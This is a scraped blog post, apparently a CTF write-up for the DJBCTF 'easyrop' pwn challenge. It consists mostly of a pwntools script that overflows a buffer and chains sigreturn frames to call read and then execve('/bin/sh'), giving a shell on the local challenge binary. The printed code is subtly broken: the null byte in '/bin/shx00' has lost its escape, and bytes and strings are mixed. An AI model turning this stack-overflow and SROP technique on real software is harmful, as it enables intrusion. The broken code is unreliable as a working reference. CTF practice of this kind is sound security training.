zoukankan      html  css  js  c++  java
  • DJBCTF pwn recurrence

    I went to act in a movie for my friend, so I didn't play DJBCTF.

    easyrop

    SROP:https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/#_6

    gadget: pop rax; syscall ; retn;

    We can use 'buf' as a stack structure.Through debugging in gdb, it can be found that the 'data' section is writable.

    Exp:

    from pwn import *
    
    local = 1
    
    binary = "./easyrop"
    
    if local == 1:
    	p = process(binary)
    
    def dbg():
    	context.log_level = 'debug'
    
    context.arch = 'amd64'
    context.os = 'linux'
    
    dbg()
    context.terminal = ['tmux','splitw','-h']
    
    buf = 0x6000E0
    pop_rax_syscall_ret = 0x4000DB
    syscall_ret = 0x4000DC
    
    # read(0,buf,0x400)
    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_read
    sigframe.rdi = 0
    sigframe.rsi = buf
    sigframe.rdx = 0x400
    sigframe.rsp = buf
    sigframe.rip = syscall_ret
    
    payload = 0x40 * b'a' + p64(pop_rax_syscall_ret) + p64(15) + str(sigframe)
    
    p.recvuntil('Welcome to DJB easyrop!')
    p.send(payload)
    
    sigframe = SigreturnFrame()
    sigframe.rax = constants.SYS_execve
    sigframe.rdi = buf + 0x180
    sigframe.rsi = 0
    sigframe.rdx = 0
    sigframe.rsp = buf
    sigframe.rip = syscall_ret
    
    payload = p64(pop_rax_syscall_ret) + p64(15) + str(sigframe)
    length = len(payload)
    payload = payload + (0x180 - length) * 'a' + '/bin/shx00'
    p.send(payload)
    
    p.interactive()
    
  • 相关阅读:
    个人附加作业
    个人最终总结
    结对作业--电梯调度
    VS2015安装&简单的C#单元测试
    C#程序代码分析(第三周)
    HTML学习有感
    gitlab使用有感之坚持
    学习有感

    Activity总结
  • 原文地址:https://www.cnblogs.com/lemon629/p/14335913.html
Copyright © 2011-2022 走看看